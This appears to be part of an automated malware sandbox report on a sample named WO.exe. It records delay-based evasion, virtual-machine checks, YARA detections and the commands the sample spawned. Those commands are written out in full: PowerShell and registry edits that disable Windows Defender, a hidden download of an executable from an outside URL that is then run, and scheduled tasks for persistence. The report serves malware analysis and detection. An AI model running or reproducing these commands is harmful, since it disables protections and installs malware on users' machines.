                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4228Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4192Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\Desktop\WO.exeFile opened: C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.tmpJump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeFile opened: C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmpJump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeFile opened: C:\Users\user\AppData\Local\Temp\4782.tmpJump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeFile opened: C:\Users\user\AppData\Jump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeFile opened: C:\Users\user\Jump to behavior
                                  Source: WO.exe, 00000012.00000002.1814337059.0000000000545000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
                                  Source: reddit.exe, 00000035.00000002.2895884441.0000000000778000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
                                  Source: reddit.exe, 00000006.00000002.2895876623.00000000006CE000.00000004.00000020.00020000.00000000.sdmp, reddit.exe, 0000001B.00000002.2896012153.00000000006C8000.00000004.00000020.00020000.00000000.sdmp, reddit.exe, 0000001C.00000002.2895946149.00000000005A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeCode function: 0_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,0_2_000000014000D9C4
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

                                  HIPS / PFW / Operating System Protection Evasion

                                  barindex
                                  Yara detected Powershell download and execute
                                  Source: Yara matchFile source: amsi64_2316.amsi.csv, type: OTHER
                                  Source: Yara matchFile source: amsi64_6104.amsi.csv, type: OTHER
                                  Source: Yara matchFile source: amsi64_4476.amsi.csv, type: OTHER
                                  Source: Yara matchFile source: amsi64_4996.amsi.csv, type: OTHER
                                  Source: Yara matchFile source: Process Memory Space: WO.exe PID: 6924, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: WO.exe PID: 2476, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: WO.exe PID: 6100, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: WO.exe PID: 6156, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\6F6D.tmp\6F7E.tmp\6F7F.bat, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\7038.tmp\7039.tmp\703A.bat, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\481A.tmp\481B.tmp\481C.bat, type: DROPPED
                                  Disables Windows Defender (via service or powershell)
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                  Modifies Windows Defender protection settings
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                  Source: C:\Users\user\Desktop\WO.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat C:\Users\user\Desktop\WO.exe"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\reddit.exe "C:\Users\user\AppData\Local\Temp\reddit.exe" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditLogon" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "RunRedditLogon" /tr "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" /sc onlogon /rl highest /fJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditMinute" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "RunRedditMinute" /tr "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" /sc minute /mo 1 /rl highest /fJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc config WinDefend start= disabledJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net stop WinDefendJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /fJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /fJump to behavior
                                  Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 stop WinDefendJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\6F6D.tmp\6F7E.tmp\6F7F.bat C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\7038.tmp\7039.tmp\703A.bat C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\reddit.exe "C:\Users\user\AppData\Local\Temp\reddit.exe" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditLogon" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditMinute" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc config WinDefend start= disabledJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net stop WinDefendJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /fJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /fJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\reddit.exe "C:\Users\user\AppData\Local\Temp\reddit.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditLogon"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditMinute"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net stop WinDefend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                                  Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 stop WinDefend
                                  Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 stop WinDefend
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\481A.tmp\481B.tmp\481C.bat C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\reddit.exe "C:\Users\user\AppData\Local\Temp\reddit.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditLogon"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditMinute"
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
